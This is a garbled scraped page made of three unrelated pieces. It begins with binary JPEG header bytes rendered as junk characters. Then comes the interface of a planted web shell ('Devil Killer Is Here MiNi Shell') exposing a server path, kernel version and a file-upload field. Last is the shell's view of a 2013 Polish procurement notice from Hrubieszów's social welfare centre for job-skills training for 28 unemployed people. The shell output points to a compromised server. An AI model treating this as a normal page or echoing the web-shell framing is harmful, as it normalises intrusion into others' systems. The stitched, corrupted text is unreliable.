JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130524/202994-N-2013.html

<p class="kh_header"><b>Hrubieszów: Usługi szkoleniowe dla Beneficjentów Ostatecznych Projektu Systemowego realizowanego przez Miejski Ośrodek Pomocy Społecznej w Hrubieszowie 
pod nazwą
Czas na aktywność w Hrubieszowie</b><br>
<b>Numer ogłoszenia: 202994 - 2013; data zamieszczenia: 24.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 3-go Maja 15, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6965560, faks 084 6965560.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla Beneficjentów Ostatecznych Projektu Systemowego realizowanego przez Miejski Ośrodek Pomocy Społecznej w Hrubieszowie 
pod nazwą
Czas na aktywność w Hrubieszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa szkoleniowa, polegająca na przeprowadzeniu szkoleń dla 28 osób bezrobotnych Beneficjentów ostatecznych Projektu Systemowego realizowanego przez Miejski Ośrodek Pomocy Społecznej w Hrubieszowie pod nazwą Czas na aktywność w Hrubieszowie - Zadanie 1 Aktywna Integracja. Projekt realizowany jest przez Miejski Ośrodek Pomocy Społecznej w Hrubieszowie w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Unii Europejskiej - Priorytet VII Promocja Integracji Społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

2.	Przedmiot zamówienia obejmuje przeprowadzenie szkoleń dla osób bezrobotnych w następującym zakresie:

1)	Moduł I - Trening kompetencji i umiejętności społecznych. 
Szkolenie odbędzie się w Hrubieszowie, w terminie do dnia 31 lipca 2013 r.
Usługa szkoleniowa obejmuje szkolenie dla 28 osób, podzielonych na dwie grupy szkoleniowe z tego: 
- I grupa szkoleniowa obejmuje 14 osób 
- II grupa szkoleniowa obejmuje 14 osób. 
Szkolenie obejmuje 4 dni szkoleniowe dla każdej grupy.
Zamawiający przewiduje 32 godziny dydaktyczne dla każdej grupy szkoleniowej oddzielnie (32 x 45 min x 2 grupy). Forma przeprowadzonych szkoleń - warsztaty / ćwiczenia.
Tematyka szkoleń musi obejmować:
-Naukę umiejętności komunikacji interpersonalnej.
-Trening asertywności.
-	Umiejętności społeczne: rozwiązywanie konfliktów, konstruktywna krytyka, wyrażanie opinii.
Zamawiający nie dopuszcza możliwości zmiany miejscowości, w której Zamawiający zaplanował szkolenia. Szkolenie I i II grupy musi odbyć się w tym samym terminie.

      Obowiązki wykonawcy:
-	Zapewnienie 2-ch sal szkoleniowych na terenie miasta Hrubieszowa z wyposażeniem (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart). Każda sala powinna mieścić minimalnie 15 osób i krzesła tapicerowane, temperatura w sali 21 - 23 st. C;
-	Zapewnienie jednego posiłku dla każdego uczestnika szkolenia oraz dodatkowo serwisu kawowego z poczęstunkiem (kawa, herbata, woda, suche ciastka) podczas  szkoleń - 2 razy dziennie;
-	Przygotowanie szczegółowego programu oraz harmonogramu szkolenia, prezentacje multimedialne;
-	Wystawienie uczestnikom szkolenia certyfikatów o ukończeniu szkolenia zawierających informację o jego terminie oraz wymiarze godzin;
-	Przeprowadzenie ewaluacji szkolenia - dokonanie oceny szkolenia za pomocą ankiet ewaluacyjnych;
-	Opracowanie i przekazanie uczestnikom szkolenia niezbędnych materiałów szkoleniowych;
-	Przedstawienie wyników szkolenia w terminie określonym w umowie z Zamawiającym.
   
2)	Moduł II - Trening pracy
Szkolenie odbędzie się w Hrubieszowie, w terminie do dnia  31 lipca 2013 r. 
Usługa szkoleniowa obejmuje szkolenie dla 28 osób, podzielonych na dwie grupy szkoleniowe, z tego:
- I grupa szkoleniowa obejmuje 14 osób 
- II grupa szkoleniowa obejmuje 14 osób. 
Szkolenie obejmuje 4 dni szkoleniowe dla każdej grupy. 
Zamawiający przewiduje 28 godzin dydaktycznych dla każdej grupy szkoleniowej oddzielnie (28 x 45 min x 2 grupy). Forma przeprowadzonych szkoleń - warsztaty / ćwiczenia, praca  w grupie. 
     Tematyka szkoleń musi obejmować:
-	Naukę funkcjonowania w grupie i odpowiedzialność za grupę  - trening pracy w grupie.
-	Techniki intensywnego i efektywnego poszukiwania pracy (APP).
-	Naukę wzorów zachowań zawodowych.
-	Nauka przeprowadzania rozmów kwalifikacyjnych.
-	Pisanie CV, podania o pracę, listu motywacyjnego, innych dokumentów aplikacyjnych,      w tym z wykorzystaniem aplikacji komputerowych.
-	Zdiagnozowanie potencjału i predyspozycji zawodowych uczestników szkolenia.
-	Lepsze poznanie się i integrację Beneficjentów Ostatecznych.
-	Trening - couching indywidualny: przygotowanie do zwiększenia aktywności zawodowej, kształtowanie postaw samodzielności w funkcjonowaniu na rynku pracy, ukierunkowanie na identyfikację własnych zasobów i potrzeb zawodowych, ukierunkowanie na współpracę w zespole.
Trening - couching indywidualny dla 28 osób przeprowadzony zostanie w formie spotkań         z psychologiem i doradcą zawodowym, podczas których zostanie wypracowany Indywidualny Plan Działania. 
Zamawiający nie dopuszcza możliwości zmiany miejscowości, w której Zamawiający zaplanował szkolenia. Szkolenie I i II grupy musi odbyć się w tym samym terminie.

Obowiązki wykonawcy:
-		Zapewnienie 2-ch sal szkoleniowych na terenie miasta Hrubieszowa z wyposażeniem (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart). Każda sala powinna mieścić minimalnie 15 osób i krzesła tapicerowane, temperatura w sali 21 - 23 st.C;
-	Zapewnienie jednego posiłku dla każdego uczestnika szkolenia oraz dodatkowo serwisu kawowego z poczęstunkiem (kawa, herbata, woda, suche ciastka) podczas szkoleń - 2 razy dziennie;
-	Przygotowanie szczegółowego programu oraz harmonogramu szkolenia, prezentacje multimedialne;
-	Wystawienie uczestnikom szkolenia certyfikatów o ukończeniu szkolenia zawierających informację o jego terminie oraz wymiarze godzin;
-	Przeprowadzenie ewaluacji szkolenia - dokonanie oceny szkolenia za pomocą ankiet ewaluacyjnych ;
-	Opracowanie i przekazanie uczestnikom szkolenia niezbędnych materiałów szkoleniowych;
-	Przedstawienie wyników szkolenia w terminie określonym w umowie z Zamawiającym.

3)	Moduł III - Organizacja i finansowanie poradnictwa i wsparcia grupowego                w zakresie podniesienia kompetencji życiowych i umiejętności społeczno - zawodowych umożliwiających docelowo powrót do życia społecznego, w tym powrót na rynek pracy   i aktywizację zawodową.
Szkolenie odbędzie się w Hrubieszowie, w terminie do dnia 09 sierpnia 2013 r.
Usługa szkoleniowa obejmuje szkolenie dla 28 osób, podzielonych na dwie grupy szkoleniowe z tego:
- I grupa szkoleniowa obejmuje 14 osób 
             - II grupa szkoleniowa obejmuje 14 osób. 
Szkolenie obejmuje 4 dni szkoleniowe dla każdej grupy. 
Zamawiający przewiduje 24 godziny dydaktyczne dla każdej grupy szkoleniowej oddzielnie (24 x 45 min x 2 grupy).
Forma przeprowadzonych szkoleń - warsztaty / ćwiczenia.
Tematyka szkoleń musi obejmować:
-	Organizację i planowanie w życiu codziennym i pracy zawodowej.
-	Trening przygotowania i realizacji budżetu domowego ( trening budżetowy).
-	Przedstawienie zasad przygotowania pism urzędowych.
-	Stosowanie prawa na co dzień, w tym przedstawienie terminów prawnych niezbędnych dla właściwego funkcjonowania w społeczeństwie. 
Zamawiający nie dopuszcza możliwości zmiany miejscowości, w której Zamawiający zaplanował szkolenia. Szkolenie I i II grupy musi odbyć się w tym samym terminie.

      Obowiązki wykonawcy:
-		Zapewnienie 2-ch sal szkoleniowych na terenie miasta Hrubieszowa z wyposażeniem (rzutnik multimedialny, laptop, ekran na statywie, papier do flipczartu, flipczart). Każda sala powinna mieścić minimalnie 15 osób i krzesła tapicerowane, temperatura w sali 21 - 23 st. C;
-	Zapewnienie jednego posiłku dla każdego uczestnika szkolenia oraz dodatkowo serwisu kawowego z poczęstunkiem (kawa, herbata, woda, suche ciastka) podczas  szkoleń - 2 razy dziennie;
-	Przygotowanie szczegółowego programu oraz harmonogramu szkolenia, prezentacje multimedialne;
-	Wystawienie uczestnikom szkolenia certyfikatów o ukończeniu szkolenia zawierających informację o jego terminie oraz wymiarze godzin;
-	Przeprowadzenie ewaluacji szkolenia - dokonanie oceny szkolenia za pomocą ankiet ewaluacyjnych;
-	Opracowanie i przekazanie uczestnikom szkolenia niezbędnych materiałów szkoleniowych;
-	Przedstawienie wyników szkolenia w terminie określonym w umowie z Zamawiającym.


Obowiązki wykonawcy po każdym zakończonym szkoleniu:

Wykonawca ma obowiązek po każdym zakończonym szkoleniu zebrać i dostarczyć do Zleceniodawcy następujące dokumenty:
-	 kserokopia wydanych zaświadczeń - certyfikatów,
-	1 komplet materiałów szkoleniowych, które były podczas zajęć przekazane uczestnikom;
-	 ankiety ewaluacyjne przeprowadzone przed szkoleniem w trakcie szkolenia oraz ankiety ewaluacyjne poszkoleniowe
-	oznaczone logo PO KL, EFS,  listy skorzystania z cateringu na zajęciach;
-	oznaczone logo PO KL, EFS, listy odbioru materiałów szkoleniowych / publikacji / materiałów pomocniczych
-	oznaczone logo PO KL, EFS, listy odbioru zaświadczeń / certyfikatów
-	zdjęcia z przeprowadzonych szkoleń na płycie DVD lub CD..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wpisu do rejestru instytucji szkoleniowych zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004 r.   w sprawie rejestru instytucji szkoleniowych (Dz. U. 236, poz. 2365), zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., nr 69 poz. 415 z późn. zm.)  
Na potwierdzenie spełnienia tego warunku Zamawiający wymaga złożenia oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zostały wykonane,        a w przypadku okresowych lub ciągłych są wykonywane należycie co najmniej trzy usługi odpowiadające swoim charakterem przedmiotowi zamówienia. 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składnia ofert przeprowadził co najmniej 3 usługi szkolenia dla osób zagrożonych wykluczeniem społecznym, o tematyce tożsamej do przedmiotu zamówienia, dla przynajmniej 10 osób każda. 
Spełnianie warunku zostanie ocenione na podstawie złożonego wykazu przeprowadzonych szkoleń wraz z dokumentami potwierdzającymi że zostały wykonane należycie.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem technicznym niezbędnym do wykonania zamówienia, tj.  Posiadanie zaplecza technicznego, tj. co najmniej 2-ch sal szkoleniowych wyposażonych w minimum po 15 stanowisk (stoliki i krzesła), tablicę kredową i/lub sucho ścieralną  i  flipchart  z  zapasem  kartek,  rzutnik  multimedialny,  ekran projekcyjny. 

Na potwierdzenie spełnienia tego warunku Zamawiający wymaga złożenia oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi     wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie kadrą dydaktyczną z kwalifikacjami, wiedzą i doświadczeniem                  w realizacji szkoleń dla osób zagrożonych wykluczeniem społecznym, tj.                
- co najmniej po jednej osobie posiadającej wykształcenie uprawniające do prowadzenia szkolenia zgodnego z modułami oraz doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń, która przeprowadziła co najmniej 3 szkolenia w zakresie opisanym w przedmiocie zamówienia do Modułu nr I i III. 
  - co najmniej jedną osobą posiadającą wykształcenie wyższe z przygotowaniem z zakresu   psychologii oraz posiadać uprawnienia doradcy zawodowego, doświadczenie                 w prowadzeniu kursów/ warsztatów/szkoleń, która przeprowadziła co najmniej 3 szkolenia w zakresie opisanym w  przedmiocie zamówienia - do Modułu II.  
  Spełnianie warunku zostanie ocenione na podstawie złożonego wykazu osób uczestniczących w wykonywaniu zamówienia oraz oświadczenia, że wymienione osoby posiadają wymagane wykształcenie i doświadczenie; na zasadzie spełnia/nie spełnia. 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca znajdował się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
Na potwierdzenie spełnienia tego warunku Zamawiający wymaga złożenia oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Formularz ofertowy wg wzoru - załącznik nr 1.
b)	Dokumenty i oświadczenia wymienione w rozdziale VI. SIWZ.
c)	W przypadku udziału podwykonawców - załącznik nr 9
d)	Pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji       niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli dotyczy 
e)	Pełnomocnictwo, jeżeli Wykonawcę reprezentuje pełnomocnik. Pełnomocnictwo powinno być złożone w oryginale lub w formie kopii poświadczonej za zgodność         z oryginałem przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Wykształcenie kadry dydaktycznej - 25</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia  publicznego.
2.	W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego.
3.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
4.	Zmiany umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy Prawo zamówień publicznych, stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte  w specyfikacji istotnych warunków zamówienia.
5.	Wszelkie zmiany postanowień niniejszej umowy mogą nastąpić pisemnie, za zgodą obu stron, z zastrzeżeniem ust. 4.
6.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	termin realizacji: w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne, itp.), mającej bezpośredni wpływ na terminowość wykonania usług oraz w przypadku zaistnienia niekorzystnych warunków klimatycznych, 
2)	wynagrodzenie - w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
3)	przedmiot umowy - jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa lub wynika z okoliczności, których strony umowy nie mogły przewidzieć w momencie składania ofert (np. brak dostępności wymienionego             w ofercie sprzętu). 
7.	Nie stanowi zmiany umowy:
1)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
2)	zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.  
3)	W uzasadnionych przypadkach losowych Zamawiający dopuszcza możliwość zmiany osoby przeprowadzającej szkolenie, wykazanej w załączniku nr 6 do SIWZ, pod warunkiem udokumentowania równoważnego doświadczenia i kwalifikacji                  z doświadczeniem i kwalifikacjami wykazanymi w ofercie dla zastępowanej osoby. 
8.	Dokonanie zmian, o których mowa  w ust. 6 wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umhrubieszow.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Hrubieszowie ul. 3-go Maja 15, 22-500 Hrubieszów tel./fax (084) 696 55 60.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Hrubieszowie, ul. 3-go Maja 15, 22-500 Hrubieszów w pokoju nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowanie ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki
Priorytet VII Promocja Integracji Społecznej
Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji
